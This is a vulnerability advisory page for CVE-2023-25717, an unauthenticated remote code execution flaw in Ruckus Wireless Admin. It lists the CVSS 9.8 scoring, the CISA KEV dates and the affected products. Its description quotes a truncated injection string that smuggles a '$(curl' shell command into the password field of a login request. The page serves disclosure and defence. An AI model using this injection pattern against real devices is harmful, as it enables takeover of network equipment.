TROYANOSYVIRUS

CVE-2023-25717

CRITICAL | CISA KEV | 9.8

Description

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

CVE details

CVSS v3.1 score: 9.8
Severity: CRITICAL
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack vector: NETWORK
Complexity: LOW
Privileges required: NONE
User interaction: NONE
Published: 2/13/2023
Last modified: 11/3/2025
Source: kev
Honeypot sightings: 0

CISA KEV

Vendor: Ruckus Wireless
Product: Multiple Products
Vulnerability name: Multiple Ruckus Wireless Products CSRF and RCE Vulnerability
Date added to KEV: 2023-05-12
Remediation due date: 2023-06-02
Ransomware use: Unknown

Affected products

commscope:ruckus_smartzone_firmware, ruckuswireless:e510, ruckuswireless:h320, ruckuswireless:h350, ruckuswireless:h500, ruckuswireless:h510, ruckuswireless:h550, ruckuswireless:m510, ruckuswireless:m510-jp, ruckuswireless:p300, ruckuswireless:q410, ruckuswireless:q710, ruckuswireless:q910, ruckuswireless:r300, ruckuswireless:r310, ruckuswireless:r320, ruckuswireless:r350, ruckuswireless:r500, ruckuswireless:r510, ruckuswireless:r550, ruckuswireless:r560, ruckuswireless:r600, ruckuswireless:r610, ruckuswireless:r650, ruckuswireless:r700, ruckuswireless:r710, ruckuswireless:r720, ruckuswireless:r730, ruckuswireless:r750, ruckuswireless:r760, ruckuswireless:r850, ruckuswireless:ruckus_wireless_admin, ruckuswireless:smartzone_ap, ruckuswireless:sz-144, ruckuswireless:sz-144-federal, ruckuswireless:sz100, ruckuswireless:sz300, ruckuswireless:sz300-federal, ruckuswireless:t300, ruckuswireless:t301n, ruckuswireless:t301s, ruckuswireless:t310c, ruckuswireless:t310d, ruckuswireless:t310n, ruckuswireless:t310s, ruckuswireless:t350c, ruckuswireless:t350d, ruckuswireless:t350se, ruckuswireless:t504, ruckuswireless:t610, ruckuswireless:t710, ruckuswireless:t710s, ruckuswireless:t750, ruckuswireless:t750se, ruckuswireless:t811-cm, ruckuswireless:t811-cm\(non-spf\), ruckuswireless:zd1000, ruckuswireless:zd1100, ruckuswireless:zd1200, ruckuswireless:zd3000, ruckuswireless:zd5000

Weaknesses (CWE)

CWE-94

IOC correlations

No correlations recorded

This product uses data from the NVD API but is not endorsed or certified by the NVD.